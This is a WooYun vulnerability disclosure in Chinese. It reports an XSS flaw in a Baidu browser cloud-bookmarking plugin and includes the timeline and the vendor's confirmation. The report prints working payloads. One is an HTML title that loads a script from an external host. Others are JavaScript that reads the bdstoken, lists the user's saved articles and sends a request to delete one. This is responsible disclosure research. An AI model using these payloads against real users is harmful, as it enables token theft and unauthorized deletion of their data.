当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144510

漏洞标题:百度浏览器插件存在缺陷导致XSS

相关厂商:百度

漏洞作者: 隐形人真忙

提交时间:2015-10-02 16:27

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:远程代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-02: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

百度浏览器某插件XSS

详细说明:

最近翻了翻百度浏览器,发现有个百度云收藏插件,下载量挺多的:

1.png


在浏览器中,主要是为了收藏一些网页到百度网盘中的百度文章里,用邪恶的title测试一下,发现存在XSS,在搭建的http域下居然可以控制**.**.**.**。

2.png


测试一下获取**.**.**.**的bdstoken:

<!DOCTYPE html>
<html>
<head>
<title>
<img src=x onerror=alert(window.__CONF__.bdstoken)>
</title>
</head>
<body>
xss
</body>
</html>


3.png


找了一圈,发现虽然不能拿到BDUSS,但是结合前面的bdstoken和一些DOM操作可以做一些其他的事情,比如浏览文章列表,删除文章等操作,下面以删除一篇文章为例:
删除文章测试代码:
本地1.html:

<!DOCTYPE html>
<html>
<head>
<title>
<img src=x onerror="var s=document.createElement('script');s.src='http://**.**.**.**/baidu.js';document.body.appendChild(s);"> 
</title>
</head>
<body>
xss
</body>
</html>


使用该插件对这个网页进行收藏,就可以触发外部js,baidu.js:

var f = document.createElement("iframe") ;
f.src = "http://**.**.**.**" ;
document.body.appendChild(f) ;
f.onload = function(){
	var d = f.contentDocument;
    var w = f.contentWindow ;
    var bdstoken = w.__CONF__.bdstoken ;
    var keys = [] ;
	var s = w.document.body.getElementsByClassName("__unitList clearfix") ;
    var nodes = s[0].childNodes ;
    console.log(nodes) ;
    for(i in nodes){
        if(nodes[i].nodeName == 'LI'){
            keys.push(nodes[i].id.substr(4)) ;
        }
    }
    console.log(keys);
    data = "param={\"records\":[\"" + keys[0] + "\"]}&bdstoken=" + bdstoken ;
    var xmlhttp = null; 
    xmlhttp = new XMLHttpRequest(); 
    xmlhttp.onreadystatechange = function(){ 
        if (xmlhttp.readyState == 4) { 
            if (xmlhttp.status == 200) { 
                var responseText = xmlhttp.responseText; 
                var w = parseDom(responseText) ;
                console.log(w); 
            } 
        } 
    } ; 
    url = "http://**.**.**.**/fav/delete"
    xmlhttp.open("POST", url, true); 
    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
    xmlhttp.send(data); 
}


还可以查看文章列表:

4.png


5.png


Baidu.js:

var w = f.contentWindow ;
    var titles = [] ;
    var s = w.document.body.getElementsByClassName("__unitList clearfix") ;
    var nodes = s[0].childNodes ;
    for(i in nodes){
        if(nodes[i].nodeName == 'LI'){
            var t = nodes[i].childNodes[5].childNodes[0].getElementsByTagName("h4")[0].getElementsByTagName("a")[0].text ;
            titles.push(t + "\n") ;
        }
    }
alert(titles) ;

漏洞证明:

rank多给点儿行吗,用不了乌云搜索真蛋疼....

4.png


5.png

修复方案:

处理一下title,进行过滤。

版权声明:转载请注明来源 隐形人真忙@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-10-10 10:12

厂商回复:

感谢提交

最新状态:

暂无